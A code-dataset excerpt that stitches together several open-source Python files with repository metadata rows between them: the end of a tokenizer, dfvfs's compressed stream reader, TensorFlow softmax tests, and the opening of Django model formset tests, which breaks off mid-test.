continue
if column > indents[-1]: # count indents or dedents
indents.append(column)
yield (INDENT, line[:pos], (lnum, 0), (lnum, pos), line)
while column < indents[-1]:
if column not in indents:
raise IndentationError(
"unindent does not match any outer indentation level",
("<tokenize>", lnum, pos, line))
indents = indents[:-1]
yield (DEDENT, '', (lnum, pos), (lnum, pos), line)
else: # continued statement
if not line:
raise TokenError, ("EOF in multi-line statement", (lnum, 0))
continued = 0
while pos < max:
pseudomatch = pseudoprog.match(line, pos)
if pseudomatch: # scan for tokens
start, end = pseudomatch.span(1)
spos, epos, pos = (lnum, start), (lnum, end), end
token, initial = line[start:end], line[start]
if initial in numchars or \
(initial == '.' and token != '.'): # ordinary number
yield (NUMBER, token, spos, epos, line)
elif initial in '\r\n':
yield (NL if parenlev > 0 else NEWLINE,
token, spos, epos, line)
elif initial == '#':
assert not token.endswith("\n")
yield (COMMENT, token, spos, epos, line)
elif token in triple_quoted:
endprog = endprogs[token]
endmatch = endprog.match(line, pos)
if endmatch: # all on one line
pos = endmatch.end(0)
token = line[start:pos]
yield (STRING, token, spos, (lnum, pos), line)
else:
strstart = (lnum, start) # multiple lines
contstr = line[start:]
contline = line
break
elif initial in single_quoted or \
token[:2] in single_quoted or \
token[:3] in single_quoted:
if token[-1] == '\n': # continued string
strstart = (lnum, start)
endprog = (endprogs[initial] or endprogs[token[1]] or
endprogs[token[2]])
contstr, needcont = line[start:], 1
contline = line
break
else: # ordinary string
yield (STRING, token, spos, epos, line)
elif initial in namechars: # ordinary name
yield (NAME, token, spos, epos, line)
elif initial == '\\': # continued stmt
continued = 1
else:
if initial in '([{': parenlev = parenlev + 1
elif initial in ')]}': parenlev = parenlev - 1
yield (OP, token, spos, epos, line)
else:
yield (ERRORTOKEN, line[pos],
(lnum, pos), (lnum, pos+1), line)
pos = pos + 1
for indent in indents[1:]: # pop remaining indent levels
yield (DEDENT, '', (lnum, 0), (lnum, 0), '')
yield (ENDMARKER, '', (lnum, 0), (lnum, 0), '')
if __name__ == '__main__': # testing
import sys
if len(sys.argv) > 1: tokenize(open(sys.argv[1]).readline)
else: tokenize(sys.stdin.readline)
| gpl-2.0 | -3,449,478,419,062,740,500 | 38.339759 | 89 | 0.506554 | false |
log2timeline/dfvfs | dfvfs/file_io/compressed_stream_io.py | 2 | 9519 | # -*- coding: utf-8 -*-
"""The compressed stream file-like object implementation."""
import os
from dfvfs.compression import manager as compression_manager
from dfvfs.file_io import file_io
from dfvfs.lib import errors
from dfvfs.resolver import resolver
class CompressedStream(file_io.FileIO):
"""File input/output (IO) object of a compressed stream."""
# The size of the compressed data buffer.
_COMPRESSED_DATA_BUFFER_SIZE = 8 * 1024 * 1024
def __init__(self, resolver_context, path_spec):
"""Initializes a file input/output (IO) object.
Args:
resolver_context (Context): resolver context.
path_spec (PathSpec): a path specification.
"""
super(CompressedStream, self).__init__(resolver_context, path_spec)
self._compression_method = None
self._file_object = None
self._compressed_data = b''
self._current_offset = 0
self._decompressor = None
self._realign_offset = True
self._uncompressed_data = b''
self._uncompressed_data_offset = 0
self._uncompressed_data_size = 0
self._uncompressed_stream_size = None
def _Close(self):
"""Closes the file-like object.
If the file-like object was passed in the init function
the compressed stream file-like object does not control
the file-like object and should not actually close it.
"""
self._compressed_data = b''
self._file_object = None
self._decompressor = None
self._uncompressed_data = b''
def _GetDecompressor(self):
"""Retrieves the decompressor.
Returns:
Decompressor: decompressor.
"""
return compression_manager.CompressionManager.GetDecompressor(
self._compression_method)
def _GetUncompressedStreamSize(self):
"""Retrieves the uncompressed stream size.
Returns:
int: uncompressed stream size.
"""
self._file_object.seek(0, os.SEEK_SET)
self._decompressor = self._GetDecompressor()
self._uncompressed_data = b''
compressed_data_offset = 0
compressed_data_size = self._file_object.get_size()
uncompressed_stream_size = 0
while compressed_data_offset < compressed_data_size:
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
if read_count == 0:
break
compressed_data_offset += read_count
uncompressed_stream_size += self._uncompressed_data_size
return uncompressed_stream_size
def _Open(self, mode='rb'):
"""Opens the file-like object.
Args:
mode (Optional[str]): file access mode.
Raises:
AccessError: if the access to open the file was denied.
IOError: if the file-like object could not be opened.
OSError: if the file-like object could not be opened.
PathSpecError: if the path specification is incorrect.
"""
if not self._path_spec.HasParent():
raise errors.PathSpecError(
'Unsupported path specification without parent.')
self._compression_method = getattr(
self._path_spec, 'compression_method', None)
if self._compression_method is None:
raise errors.PathSpecError(
'Path specification missing compression method.')
self._file_object = resolver.Resolver.OpenFileObject(
self._path_spec.parent, resolver_context=self._resolver_context)
def _AlignUncompressedDataOffset(self, uncompressed_data_offset):
"""Aligns the compressed file with the uncompressed data offset.
Args:
uncompressed_data_offset (int): uncompressed data offset.
"""
self._file_object.seek(0, os.SEEK_SET)
self._decompressor = self._GetDecompressor()
self._uncompressed_data = b''
compressed_data_offset = 0
compressed_data_size = self._file_object.get_size()
while compressed_data_offset < compressed_data_size:
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
if read_count == 0:
break
compressed_data_offset += read_count
if uncompressed_data_offset < self._uncompressed_data_size:
self._uncompressed_data_offset = uncompressed_data_offset
break
uncompressed_data_offset -= self._uncompressed_data_size
def _ReadCompressedData(self, read_size):
"""Reads compressed data from the file-like object.
Args:
read_size (int): number of bytes of compressed data to read.
Returns:
int: number of bytes of compressed data read.
"""
compressed_data = self._file_object.read(read_size)
read_count = len(compressed_data)
self._compressed_data = b''.join([self._compressed_data, compressed_data])
self._uncompressed_data, self._compressed_data = (
self._decompressor.Decompress(self._compressed_data))
self._uncompressed_data_size = len(self._uncompressed_data)
return read_count
# Note: that the following functions do not follow the style guide
# because they are part of the file-like object interface.
# pylint: disable=invalid-name
def read(self, size=None):
"""Reads a byte string from the file-like object at the current offset.
The function will read a byte string of the specified size or
all of the remaining data if no size was specified.
Args:
size (Optional[int]): number of bytes to read, where None is all
remaining data.
Returns:
bytes: data read.
Raises:
IOError: if the read failed.
OSError: if the read failed.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._current_offset < 0:
raise IOError(
'Invalid current offset: {0:d} value less than zero.'.format(
self._current_offset))
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
if self._uncompressed_stream_size < 0:
raise IOError('Invalid uncompressed stream size.')
if self._current_offset >= self._uncompressed_stream_size:
return b''
if self._realign_offset:
self._AlignUncompressedDataOffset(self._current_offset)
self._realign_offset = False
if size is None:
size = self._uncompressed_stream_size
if self._current_offset + size > self._uncompressed_stream_size:
size = self._uncompressed_stream_size - self._current_offset
uncompressed_data = b''
if size == 0:
return uncompressed_data
while size > self._uncompressed_data_size:
uncompressed_data = b''.join([
uncompressed_data,
self._uncompressed_data[self._uncompressed_data_offset:]])
remaining_uncompressed_data_size = (
self._uncompressed_data_size - self._uncompressed_data_offset)
self._current_offset += remaining_uncompressed_data_size
size -= remaining_uncompressed_data_size
if self._current_offset >= self._uncompressed_stream_size:
break
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
self._uncompressed_data_offset = 0
if read_count == 0:
break
if size > 0:
slice_start_offset = self._uncompressed_data_offset
slice_end_offset = slice_start_offset + size
uncompressed_data = b''.join([
uncompressed_data,
self._uncompressed_data[slice_start_offset:slice_end_offset]])
self._uncompressed_data_offset += size
self._current_offset += size
return uncompressed_data
def seek(self, offset, whence=os.SEEK_SET):
"""Seeks to an offset within the file-like object.
Args:
offset (int): offset to seek to.
whence (Optional(int)): value that indicates whether offset is an absolute
or relative position within the file.
Raises:
IOError: if the seek failed.
OSError: if the seek failed.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._current_offset < 0:
raise IOError(
'Invalid current offset: {0:d} value less than zero.'.format(
self._current_offset))
if whence == os.SEEK_CUR:
offset += self._current_offset
elif whence == os.SEEK_END:
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
if self._uncompressed_stream_size is None:
raise IOError('Invalid uncompressed stream size.')
offset += self._uncompressed_stream_size
elif whence != os.SEEK_SET:
raise IOError('Unsupported whence.')
if offset < 0:
raise IOError('Invalid offset value less than zero.')
if offset != self._current_offset:
self._current_offset = offset
self._realign_offset = True
def get_offset(self):
"""Retrieves the current offset into the file-like object.
Returns:
int: current offset in the uncompressed stream.
Raises:
IOError: if the file-like object has not been opened.
OSError: if the file-like object has not been opened.
"""
if not self._is_open:
raise IOError('Not opened.')
return self._current_offset
def get_size(self):
"""Retrieves the size of the file-like object.
Returns:
int: size of the uncompressed stream.
Raises:
IOError: if the file-like object has not been opened.
OSError: if the file-like object has not been opened.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
return self._uncompressed_stream_size
| apache-2.0 | -4,738,338,381,616,714,000 | 29.315287 | 80 | 0.668348 | false |
ppries/tensorflow | tensorflow/python/kernel_tests/softmax_op_test.py | 11 | 6928 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SoftmaxOp and LogSoftmaxOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
import tensorflow as tf
class SoftmaxTest(tf.test.TestCase):
def _npSoftmax(self, features, dim=-1, log=False):
if dim is -1:
dim = len(features.shape) - 1
one_only_on_dim = list(features.shape)
one_only_on_dim[dim] = 1
e = np.exp(features - np.reshape(
np.amax(
features, axis=dim), one_only_on_dim))
softmax = e / np.reshape(np.sum(e, axis=dim), one_only_on_dim)
if log:
return np.log(softmax)
else:
return softmax
def _testSoftmax(self, np_features, dim=-1, log=False, use_gpu=False):
# A previous version of the code checked the op name rather than the op type
# to distinguish between log and non-log. Use an arbitrary name to catch
# this bug in future.
name = "arbitrary"
np_softmax = self._npSoftmax(np_features, dim=dim, log=log)
with self.test_session(use_gpu=use_gpu):
if log:
tf_softmax = tf.nn.log_softmax(np_features, dim=dim, name=name)
else:
tf_softmax = tf.nn.softmax(np_features, dim=dim, name=name)
out = tf_softmax.eval()
self.assertAllCloseAccordingToType(np_softmax, out)
self.assertShapeEqual(np_softmax, tf_softmax)
if not log:
# Bonus check: the softmaxes should add to one in dimension dim.
sum_along_dim = np.sum(out, axis=dim)
self.assertAllCloseAccordingToType(
np.ones(sum_along_dim.shape), sum_along_dim)
def _testAll(self, features):
self._testSoftmax(features, use_gpu=False)
self._testSoftmax(features, log=True, use_gpu=False)
self._testSoftmax(features, use_gpu=True)
self._testSoftmax(features, log=True, use_gpu=True)
self._testOverflow(use_gpu=True)
def testNpSoftmax(self):
features = [[1., 1., 1., 1.], [1., 2., 3., 4.]]
# Batch 0: All exps are 1. The expected result is
# Softmaxes = [0.25, 0.25, 0.25, 0.25]
# LogSoftmaxes = [-1.386294, -1.386294, -1.386294, -1.386294]
#
# Batch 1:
# exps = [1., 2.718, 7.389, 20.085]
# sum = 31.192
# Softmaxes = exps / sum = [0.0320586, 0.08714432, 0.23688282, 0.64391426]
# LogSoftmaxes = [-3.44019 , -2.44019 , -1.44019 , -0.44019]
np_sm = self._npSoftmax(np.array(features))
self.assertAllClose(
np.array([[0.25, 0.25, 0.25, 0.25],
[0.0320586, 0.08714432, 0.23688282, 0.64391426]]),
np_sm,
rtol=1.e-5, atol=1.e-5)
np_lsm = self._npSoftmax(np.array(features), log=True)
self.assertAllClose(
np.array([[-1.386294, -1.386294, -1.386294, -1.386294],
[-3.4401897, -2.4401897, -1.4401897, -0.4401897]]),
np_lsm,
rtol=1.e-5, atol=1.e-5)
def _testOverflow(self, use_gpu=False):
if use_gpu:
type = np.float32
else:
type = np.float64
max = np.finfo(type).max
features = np.array(
[[1., 1., 1., 1.],
[max, 1., 2., 3.]]).astype(type)
with self.test_session(use_gpu=use_gpu):
tf_log_softmax = tf.nn.log_softmax(features)
out = tf_log_softmax.eval()
self.assertAllClose(
np.array([[-1.386294, -1.386294, -1.386294, -1.386294],
[0, -max, -max, -max]]),
out,
rtol=1.e-5, atol=1.e-5)
def testFloat(self):
self._testAll(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float32))
def testHalf(self):
self._testAll(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float16))
def testDouble(self):
self._testSoftmax(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float64))
self._testOverflow()
def test1DTesnorAsInput(self):
self._testSoftmax(
np.array([3., 2., 3., 9.]).astype(np.float64), use_gpu=False)
self._testOverflow(use_gpu=False)
def test3DTensorAsInput(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
use_gpu=False)
self._testOverflow(use_gpu=False)
def testAlongFirstDimension(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
dim=0,
use_gpu=False)
self._testOverflow(use_gpu=False)
def testAlongSecondDimension(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
dim=1,
use_gpu=False)
self._testOverflow(use_gpu=False)
def testShapeInference(self):
op = tf.nn.softmax([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]])
self.assertEqual([3, 2, 4], op.get_shape())
def testEmptyInput(self):
with self.test_session():
x = tf.constant([[]], shape=[0, 3])
self.assertEqual(0, tf.size(x).eval())
# reshape would raise if logits is empty
with self.assertRaises(tf.errors.InvalidArgumentError):
tf.nn.softmax(x, dim=0).eval()
def testDimTooLarge(self):
with self.test_session():
with self.assertRaises(tf.errors.InvalidArgumentError):
tf.nn.softmax([1., 2., 3., 4.], dim=100).eval()
def testLargeDims(self):
# Make sure that we properly handle large inputs. See
# https://github.com/tensorflow/tensorflow/issues/4425 for details
for dims in [129, 256]:
ones = np.random.rand(dims, dims).astype(np.float32)
np_softmax = self._npSoftmax(ones)
for use_gpu in [True, False]:
with self.test_session(use_gpu=use_gpu) as sess:
x = tf.placeholder(tf.float32)
y = tf.nn.softmax(x)
tf_softmax = sess.run(y, feed_dict={x: ones})
self.assertAllClose(tf_softmax, np_softmax)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | 3,633,917,365,880,471,600 | 35.083333 | 80 | 0.573326 | false |
vipul-sharma20/oh-mainline | vendor/packages/Django/tests/modeltests/model_formsets/tests.py | 51 | 61280 | from __future__ import absolute_import, unicode_literals
import datetime
import re
from datetime import date
from decimal import Decimal
from django import forms
from django.db import models
from django.forms.models import (_get_foreign_key, inlineformset_factory,
modelformset_factory)
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from .models import (Author, BetterAuthor, Book, BookWithCustomPK,
BookWithOptionalAltEditor, AlternateBook, AuthorMeeting, CustomPrimaryKey,
Place, Owner, Location, OwnerProfile, Restaurant, Product, Price,
MexicanRestaurant, ClassyMexicanRestaurant, Repository, Revision,
Person, Membership, Team, Player, Poet, Poem, Post)
class DeletionTests(TestCase):
def test_deletion(self):
PoetFormSet = modelformset_factory(Poet, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '1',
'form-MAX_NUM_FORMS': '0',
'form-0-id': str(poet.pk),
'form-0-name': 'test',
'form-0-DELETE': 'on',
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
formset.save()
self.assertTrue(formset.is_valid())
self.assertEqual(Poet.objects.count(), 0)
def test_add_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoetFormSet = modelformset_factory(Poet, can_delete=True)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '0',
'form-0-id': '',
'form-0-name': 'x' * 1000,
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poet.objects.count(), 0)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['form-0-DELETE'] = 'on'
formset = PoetFormSet(data, queryset=Poet.objects.all())
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poet.objects.count(), 0)
def test_change_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoetFormSet = modelformset_factory(Poet, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '1',
'form-MAX_NUM_FORMS': '0',
'form-0-id': six.text_type(poet.id),
'form-0-name': 'x' * 1000,
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poet.objects.count(), 1)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['form-0-DELETE'] = 'on'
formset = PoetFormSet(data, queryset=Poet.objects.all())
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poet.objects.count(), 0)
class ModelFormsetTest(TestCase):
def test_simple_save(self):
qs = Author.objects.all()
AuthorFormSet = modelformset_factory(Author, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" maxlength="100" /><input type="hidden" name="form-0-id" id="id_form-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" maxlength="100" /><input type="hidden" name="form-1-id" id="id_form-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" maxlength="100" /><input type="hidden" name="form-2-id" id="id_form-2-id" /></p>')
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-name': 'Charles Baudelaire',
'form-1-name': 'Arthur Rimbaud',
'form-2-name': '',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
author1, author2 = saved
self.assertEqual(author1, Author.objects.get(name='Charles Baudelaire'))
self.assertEqual(author2, Author.objects.get(name='Arthur Rimbaud'))
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1])
# Gah! We forgot Paul Verlaine. Let's create a formset to edit the
# existing authors with an extra form to add him. We *could* pass in a
# queryset to restrict the Author objects we edit, but in this case
# we'll use it to display them in alphabetical order by name.
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, extra=1, can_delete=False)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Arthur Rimbaud" maxlength="100" /><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></p>' % author2.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" value="Charles Baudelaire" maxlength="100" /><input type="hidden" name="form-1-id" value="%d" id="id_form-1-id" /></p>' % author1.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" maxlength="100" /><input type="hidden" name="form-2-id" id="id_form-2-id" /></p>')
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '2', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Arthur Rimbaud',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-name': 'Paul Verlaine',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# Only changed or new objects are returned from formset.save()
saved = formset.save()
self.assertEqual(len(saved), 1)
author3 = saved[0]
self.assertEqual(author3, Author.objects.get(name='Paul Verlaine'))
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1, author3])
# This probably shouldn't happen, but it will. If an add form was
# marked for deletion, make sure we don't save that form.
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, extra=1, can_delete=True)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 4)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Arthur Rimbaud" maxlength="100" /></p>\n'
'<p><label for="id_form-0-DELETE">Delete:</label> <input type="checkbox" name="form-0-DELETE" id="id_form-0-DELETE" /><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></p>' % author2.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" value="Charles Baudelaire" maxlength="100" /></p>\n'
'<p><label for="id_form-1-DELETE">Delete:</label> <input type="checkbox" name="form-1-DELETE" id="id_form-1-DELETE" /><input type="hidden" name="form-1-id" value="%d" id="id_form-1-id" /></p>' % author1.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" value="Paul Verlaine" maxlength="100" /></p>\n'
'<p><label for="id_form-2-DELETE">Delete:</label> <input type="checkbox" name="form-2-DELETE" id="id_form-2-DELETE" /><input type="hidden" name="form-2-id" value="%d" id="id_form-2-id" /></p>' % author3.id)
self.assertHTMLEqual(formset.forms[3].as_p(),
'<p><label for="id_form-3-name">Name:</label> <input id="id_form-3-name" type="text" name="form-3-name" maxlength="100" /></p>\n'
'<p><label for="id_form-3-DELETE">Delete:</label> <input type="checkbox" name="form-3-DELETE" id="id_form-3-DELETE" /><input type="hidden" name="form-3-id" id="id_form-3-id" /></p>')
data = {
'form-TOTAL_FORMS': '4', # the number of forms rendered
'form-INITIAL_FORMS': '3', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Arthur Rimbaud',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-id': str(author3.id),
'form-2-name': 'Paul Verlaine',
'form-3-name': 'Walt Whitman',
'form-3-DELETE': 'on',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# No objects were changed or saved so nothing will come back.
self.assertEqual(formset.save(), [])
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1, author3])
# Let's edit a record to ensure save only returns that one record.
data = {
'form-TOTAL_FORMS': '4', # the number of forms rendered
'form-INITIAL_FORMS': '3', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Walt Whitman',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-id': str(author3.id),
'form-2-name': 'Paul Verlaine',
'form-3-name': '',
'form-3-DELETE': '',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# One record has changed.
saved = formset.save()
self.assertEqual(len(saved), 1)
self.assertEqual(saved[0], Author.objects.get(name='Walt Whitman'))
def test_commit_false(self):
# Test the behavior of commit=False and save_m2m
author1 = Author.objects.create(name='Charles Baudelaire')
author2 = Author.objects.create(name='Paul Verlaine')
author3 = Author.objects.create(name='Walt Whitman')
meeting = AuthorMeeting.objects.create(created=date.today())
meeting.authors = Author.objects.all()
# create an Author instance to add to the meeting.
author4 = Author.objects.create(name='John Steinbeck')
AuthorMeetingFormSet = modelformset_factory(AuthorMeeting, extra=1, can_delete=True)
data = {
'form-TOTAL_FORMS': '2', # the number of forms rendered
'form-INITIAL_FORMS': '1', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(meeting.id),
'form-0-name': '2nd Tuesday of the Week Meeting',
'form-0-authors': [author2.id, author1.id, author3.id, author4.id],
'form-1-name': '',
'form-1-authors': '',
'form-1-DELETE': '',
}
formset = AuthorMeetingFormSet(data=data, queryset=AuthorMeeting.objects.all())
self.assertTrue(formset.is_valid())
instances = formset.save(commit=False)
for instance in instances:
instance.created = date.today()
instance.save()
formset.save_m2m()
self.assertQuerysetEqual(instances[0].authors.all(), [
'<Author: Charles Baudelaire>',
'<Author: John Steinbeck>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
def test_max_num(self):
# Test the behavior of max_num with model formsets. It should allow
# all existing related objects/inlines for a given object to be
# displayed, but not allow the creation of new inlines beyond max_num.
author1 = Author.objects.create(name='Charles Baudelaire')
author2 = Author.objects.create(name='Paul Verlaine')
author3 = Author.objects.create(name='Walt Whitman')
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, max_num=None, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 6)
self.assertEqual(len(formset.extra_forms), 3)
AuthorFormSet = modelformset_factory(Author, max_num=4, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 4)
self.assertEqual(len(formset.extra_forms), 1)
AuthorFormSet = modelformset_factory(Author, max_num=0, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertEqual(len(formset.extra_forms), 0)
AuthorFormSet = modelformset_factory(Author, max_num=None)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
AuthorFormSet = modelformset_factory(Author, max_num=0)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
AuthorFormSet = modelformset_factory(Author, max_num=4)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
def test_custom_save_method(self):
class PoetForm(forms.ModelForm):
def save(self, commit=True):
# change the name to "Vladimir Mayakovsky" just to be a jerk.
author = super(PoetForm, self).save(commit=False)
author.name = "Vladimir Mayakovsky"
if commit:
author.save()
return author
PoetFormSet = modelformset_factory(Poet, form=PoetForm)
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-name': 'Walt Whitman',
'form-1-name': 'Charles Baudelaire',
'form-2-name': '',
}
qs = Poet.objects.all()
formset = PoetFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
poets = formset.save()
self.assertEqual(len(poets), 2)
poet1, poet2 = poets
self.assertEqual(poet1.name, 'Vladimir Mayakovsky')
self.assertEqual(poet2.name, 'Vladimir Mayakovsky')
def test_custom_form(self):
""" Test that model_formset respects fields and exclude parameters of
custom form
"""
class PostForm1(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'posted')
class PostForm2(forms.ModelForm):
class Meta:
model = Post
exclude = ('subtitle',)
PostFormSet = modelformset_factory(Post, form=PostForm1)
formset = PostFormSet()
self.assertFalse("subtitle" in formset.forms[0].fields)
PostFormSet = modelformset_factory(Post, form=PostForm2)
formset = PostFormSet()
self.assertFalse("subtitle" in formset.forms[0].fields)
def test_model_inheritance(self):
BetterAuthorFormSet = modelformset_factory(BetterAuthor)
formset = BetterAuthorFormSet()
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" maxlength="100" /></p>\n'
'<p><label for="id_form-0-write_speed">Write speed:</label> <input type="text" name="form-0-write_speed" id="id_form-0-write_speed" /><input type="hidden" name="form-0-author_ptr" id="id_form-0-author_ptr" /></p>')
data = {
'form-TOTAL_FORMS': '1', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-author_ptr': '',
'form-0-name': 'Ernest Hemingway',
'form-0-write_speed': '10',
}
formset = BetterAuthorFormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
author1, = saved
self.assertEqual(author1, BetterAuthor.objects.get(name='Ernest Hemingway'))
hemingway_id = BetterAuthor.objects.get(name="Ernest Hemingway").pk
formset = BetterAuthorFormSet()
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
